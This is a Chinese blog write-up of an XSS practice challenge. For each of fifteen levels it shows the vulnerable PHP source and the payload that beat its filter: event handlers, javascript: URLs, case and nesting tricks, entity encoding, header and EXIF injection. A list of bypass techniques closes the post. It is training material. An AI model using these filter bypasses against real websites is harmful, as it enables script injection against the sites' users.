2019-01-03-xss_challenge

1.第一題沒啥攔截和編碼,直接顯示,源代碼如下:

ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>歡迎用戶".$str."</h2>";
payload:<script>alert(1)</script>
p1

p2

2.第二題的源代碼如下:

$str = $_GET["keyword"];
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>"."<center>
<form action=level2.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
payload:"><script>alert(1)</script>"這是直接把前面標簽閉合的意思

可以看到進行html特殊字符的編碼,經過測試以后發現,瀏覽器進行所謂的URL編碼,然后發送到服務器端解碼以后進行HTML實體編碼,對',",<,>,&符號進行編碼,注意單引號編碼不是默認的,然后返回前端被瀏覽器解析,還原成xss payload彈窗,所以這是html編碼只能防范存儲型漏洞的意思?


p3

先看下去
3.第三題源碼如下:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level3.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload: 123456' onfocus=alert(document.domain) autofocus//查了一下,網上說這個autofocus是當頁面加載時自動獲得焦點,然后onfocus是指定獲得焦點時應該觸發的事件.

顯然是做了代替,去掉了所有的大于小于號,那就只能用事件觸發了.
4.第四道同三
5.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload:1"><iframe src=javascript:alert(1)>

經測試,這道題目轉換了script和on標簽,那就嵌套或者偽協議


p4

然后發現嵌套不行,因為這個是轉換來著.....不是直接凈化掉
然后就是直接上偽協議了.


p5

6.源代碼如下:

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hRef=javascript:alert(1)>xss</a>>

這道題試了挺久,結果發現啥方法都不行,然后看了下答案,發現,我去,居然沒做大小寫轉換...,直接大小寫繞過就可以了.


p6

7.源代碼如下:

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hrhrefef=javasscriptcript:alert(1)>xss</a>>

主要嘗試了以后發現script標簽和href標簽都不見,所以考慮嵌套的手段來繞過防護,最后使用<a>標簽來完成


p7

8.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level7.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';
?>
payload:java&#115;cript:alert(1)

經過自己一波嘗試,發現全部轉小寫了,然后是直接替換了,on,href,script等關鍵詞語都被替換了,這種嵌套,偽協議,大小寫全都失效了,只能看一波writeup,結果發現他是用編碼繞過的,可以可以。。。。此處進行了html編碼來繞過。


p8

9.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的鏈接不合法?有沒有!">友情鏈接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';}
?>
payload:javascrip&#116;:alert(1)//http://xxx.com

看源代碼可知道其實它里面會檢查有沒有http://在字符串里面,如果沒有的話就直接跳轉不成功,然后凈化是先小寫,然后替換,所以還是采用Unicode編碼來繞,接著直接后面帶上http://,但是這里要使用//注釋符,注釋掉后面的http://,不然會不成功。


p9

10.源代碼如下:

$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
payload:123456" onmouseover=alert(document.domain) type="text

第十題主要是要讓挑戰者學會看源代碼,這次是看不到,所以你只能看到輸入點,輸出點是看不到的,需要手動把他找出來,這就需要找到hidden,在前端去掉之后把輸出點找出來,這里的輸出點是hidden,經實測t_link和t_history不是輸出點,所以不能用<,>然后就只能用事件輸出了,這里用onmmouseover來觸發。


p10.jpg

11.源代碼如下所示:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
payload:1" onmouseover=alert(1)

這道題目和前面差不多,直接把hidden menu找出來然后直接上事件觸發就可以了。而其中這個hidden的值就是包頭里面的referer字段,所以burp抓包也是一樣的。


p11

12.這道題目也是隱藏鍵值,然后改了user-agent的值插入xss代碼.

<input name="t_ua" value="Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" type="hidden">
修改為:
<input name="t_ua" value="1" onmouseover=alert(1)>

p12

這里介紹一下wooyun上面一個上傳新思路,通過上傳圖片修改圖片exif信息插入xss代碼,平臺在查看xss代碼的時候就可以直接執行了。
https://bugs.shuimugan.com/bug/view?bug_no=194934
13.如上:
p13

14.該題目為cookie注入xss代碼,如下:
p14

15.這道題目主要是讓人學習一波圖片上傳插入xss代碼的思路,主要是學習利用exiftool改變圖片的exif信息即可。Kali中安裝了exiftool以后直接查看并修改插入,上傳以后如果網站程序會查看圖片exif信息的話那就會執行這些代碼了。
p15

p16

確實是一個很騷的思路來著。。。。

整理一下xss繞過防護的思路:
1.大小寫繞過,如果過濾了一些關鍵詞,比如script等,直接大小寫試試,對應的解決方案就是直接將輸入轉小寫,解決。
2.偽協議,即利用一些標簽,如img, iframe,a href等等,eg:<iframe src=javascript:alert(1)>,對應防御偽協議可以直接過濾掉所謂的一些偽協議標簽就可以了。
3.嵌套,用于和大小寫繞過一樣的防護情況。。。
4.事件觸發,這樣可以處理一些過濾<,>等情況,例如onmouseover,onfocus等,過濾on可解決。
5.善于利用注釋符號,注釋一些信息。
6.編碼繞過,例如stringformcharcode,html編碼繞過等等。
7.上傳圖片含有xss代碼的exif信息

?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,002評論 6 542
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 99,400評論 3 429
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,136評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,714評論 1 317
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 72,452評論 6 412
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,818評論 1 328
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,812評論 3 446
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,997評論 0 290
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 49,552評論 1 335
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 41,292評論 3 358
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,510評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,035評論 5 363
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,721評論 3 348
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,121評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,429評論 1 294
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,235評論 3 398
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 48,480評論 2 379

推薦閱讀更多精彩內容

  • 第一部分 HTML&CSS整理答案 1. 什么是HTML5? 答:HTML5是最新的HTML標準。 注意:講述HT...
    kismetajun閱讀 27,581評論 1 45
  • 之前積累了XSS 有一段時間,因為目前開始了一件有趣的工程,需要整合非常多的知識,其中Web 安全這一塊出現最多的...
    刀背藏身閱讀 9,123評論 0 16
  • #xss 我認為xss漏洞可以根據可控變量的輸出的位置不同來進行分類 1.在html標簽中輸出 1.1在一般標簽中...
    Der_H閱讀 1,989評論 0 0
  • $HTML, HTTP,web綜合問題 1、前端需要注意哪些SEO 2、 的title和alt有什么區別 3、HT...
    Hebborn_hb閱讀 4,645評論 0 20
  • 一、健康氣質 (健康鍛煉3次)健身房運動3次。現在主要是練瑜伽,碰到舞蹈課也跟著去跳跳,出出汗。 二、思想品格 偶...
    梨渦淺笑0812閱讀 199評論 0 0